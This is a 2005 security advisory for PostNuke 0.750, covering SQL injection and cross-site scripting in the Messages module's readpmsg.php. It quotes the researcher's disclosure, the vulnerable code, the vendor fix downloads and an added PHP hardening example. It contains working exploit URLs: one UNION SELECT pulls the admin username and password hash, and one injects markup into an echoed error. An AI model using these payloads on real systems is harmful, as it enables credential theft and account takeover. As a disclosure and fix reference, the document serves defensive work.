PostNuke Input Validation Error in 'readpmsg.php' Permits SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID: 1014066
SecurityTracker URL: http://securitytracker.com/id?1014066
CVE Reference: GENERIC-MAP-NOMATCH
Date: May 27 2005
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
Version(s): 0.750 and prior versions

Description: sp3x from SecurityReason reported some input validation vulnerabilities in PostNuke. A remote user can inject SQL commands. A remote user can also conduct cross-site scripting attacks.
The '/modules/Messages/readpmsg.php' script does not properly validate user-supplied input in the 'start' parameter. A remote user can supply specially crafted parameter inputs to execute SQL commands on the underlying database.
A demonstration exploit URL is provided:
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_p
A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the PostNuke software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
A demonstration exploit URL is provided:
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0'<h1>cXIb8O3 and sp3x - SecurityReason</h1>&total_messages=1

Impact: A remote user can execute SQL commands on the underlying database.
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the PostNuke software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution: The vendor has issued a fixed version (0.750b).
1. PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-411.html
SHA1: 60ef6f7c93cfa638fc7d089e078db0eaa59f95b4
MD5: c40ebc31cfa3ada351dbe63f4e9a6255
Size: 2407332 Bytes
2. PostNuke 0.750 (zip format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-410.html
SHA1: 50edfbb3c12bed0b80413d421d1a90ff28ed0c22
MD5: 26dc0202c776f7463008c54ce8cf89b9
Size: 3501230 Bytes
3. Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes
4. Security Fix (changed files only) for PostNuke 0.750 (.zip format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-472.html
SHA1: d504155418ab6d07491b3a6c0d18834fe20bbefd
MD5: e472c9917e2ff237b354bdc87838c504
Size: 247175 Bytes

Vendor URL: www.postnuke.com/
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: "SecurityReason" <sp3x@securityreason.com>
Message History: None.

Source Message Contents

Date: Fri, 27 May 2005 17:36:06 +0200
From: "SecurityReason" <sp3x@securityreason.com>
Subject: [SECURITYREASON.COM] PostNuke Critical SQL Injection and XSS 0.750=>x

-=[ Critical SQL injection and XSS in PostNuke ]=-
Author: sp3x
Date: 27. May 2005
Affected software :
===================
PostNuke version : x=> 0.750
Description :
=============
PostNuke is an open source, open development content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/
Vulnerabilities :
*****************
Critical SQL injection :
========================
Code :
------
/modules/Messages/readpmsg.php
=======================
// $start is taken from the request (...&start=...) and, unlike $userdata
// below, is never cast to an integer before it reaches the query.
$sql = "SELECT $column[msg_id] AS \"msg_id\",
        $column[msg_image] AS \"msg_image\",
        $column[subject] AS \"subject\",
        $column[from_userid] AS \"from_userid\",
        $column[to_userid] AS \"to_userid\",
        $column[msg_time] AS \"msg_time\",
        $column[msg_text] AS \"msg_text\",
        $column[read_msg] AS \"read_msg\"
        FROM $pntable[priv_msgs]
        WHERE $column[to_userid]='" . (int)pnVarPrepForStore($userdata) . "'";
// SelectLimit() appends the offset and row count as "LIMIT $start,1" after
// the tenth line of $sql, which is why the error below reports ',1' at line 10.
$resultID =& $dbconn->SelectLimit($sql,1,$start);
if($dbconn->ErrorNo()<>0) {
    error_log("DB Error: " . $dbconn->ErrorMsg());
    // The raw driver error text, which repeats the offending input, is echoed
    // to the browser; this is the XSS vector described below.
    echo $dbconn->ErrorMsg() . "<br />";
    forumerror(0005);
}
=======================
First, let's log in as a user in PostNuke. Then send a message to yourself.
After that go to :
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0 [SQL inj]&total_messages=1
Note :
------
total_messages=1 - the id of total_messages must exist
Now you will see this error message
error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '[SQL injection],1' at line 10
========================
Exploit SQL injection :
=======================
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*&total_messages=1
And we can see the admin md5 password and nick :)
Cross-site scripting - XSS :
============================
Thanks to the error message we can also perform XSS attacks :)
Example :
---------
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0'<h1>cXIb8O3 and sp3x - SecurityReason</h1>&total_messages=1
And we get :
error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near ''[Our XSS],1' at line 10
========================
How to fix :
============
PNSA 2005-2
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes
or CVS
Greets :
========
cXIb8O3 and pkw :)
Contact :
=========
sp3x[at]securityreason[dot].com
www.securityreason.com
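A hardened version of the readpmsg.php pattern from the advisory above, as an added example written for this page and not PostNuke's own patch: it extends the integer cast the original already applies to $userdata to the 'start' offset and replaces the echoed driver error with a fixed message. The table and column names are assumed (PostNuke builds them from $pntable and $column), and the sample inputs at the end are constructed.

```php
<?php
// Added example for this page, not PostNuke's own patch. It hardens the two
// weak points the advisory shows in readpmsg.php: the raw 'start' request
// parameter reaching the LIMIT clause, and the driver's error text (which
// repeats that input) being echoed to the browser. Table and column names
// are assumed; PostNuke builds them from $pntable and $column.

// Accept only a plain non-negative decimal integer for the LIMIT offset.
// Returns the offset as an int, or null when the input must be rejected.
function parse_offset($raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $s = (string) $raw;
    // ctype_digit() is false for '', '0 UNION SELECT ...', "0'<h1>", '-1'
    // and '1e3', so the input shapes from the advisory never reach SQL.
    if ($s === '' || strlen($s) > 9 || !ctype_digit($s)) {
        return null;
    }
    return (int) $s;
}

// Build the query with $start interpolated only after it has become an int,
// the same treatment the original already gives $userdata via (int).
function private_message_query(int $userId, int $start): string
{
    return "SELECT msg_id, msg_image, subject, from_userid, to_userid,"
         . " msg_time, msg_text, read_msg FROM pn_priv_msgs"
         . " WHERE to_userid = {$userId} LIMIT {$start},1";
}

// Error path, to be called where the original echoed $dbconn->ErrorMsg():
// the driver message stays in the server log and the user gets a fixed
// string, so nothing derived from the request is reflected into the page.
function db_error_for_user(string $driverMessage): string
{
    error_log("DB Error: " . $driverMessage);
    return "Could not load messages.";
}

// Constructed inputs: valid offsets plus the input shapes the advisory
// describes (URL-decoded). Run from the CLI to see which are rejected.
foreach (['0', '12', '0 UNION SELECT ...', "0'<h1>x</h1>", '-1', '1e3'] as $in) {
    $off = parse_offset($in);
    echo str_pad(var_export($in, true), 24)
       . ($off === null ? "rejected\n" : private_message_query(2, $off) . "\n");
}
```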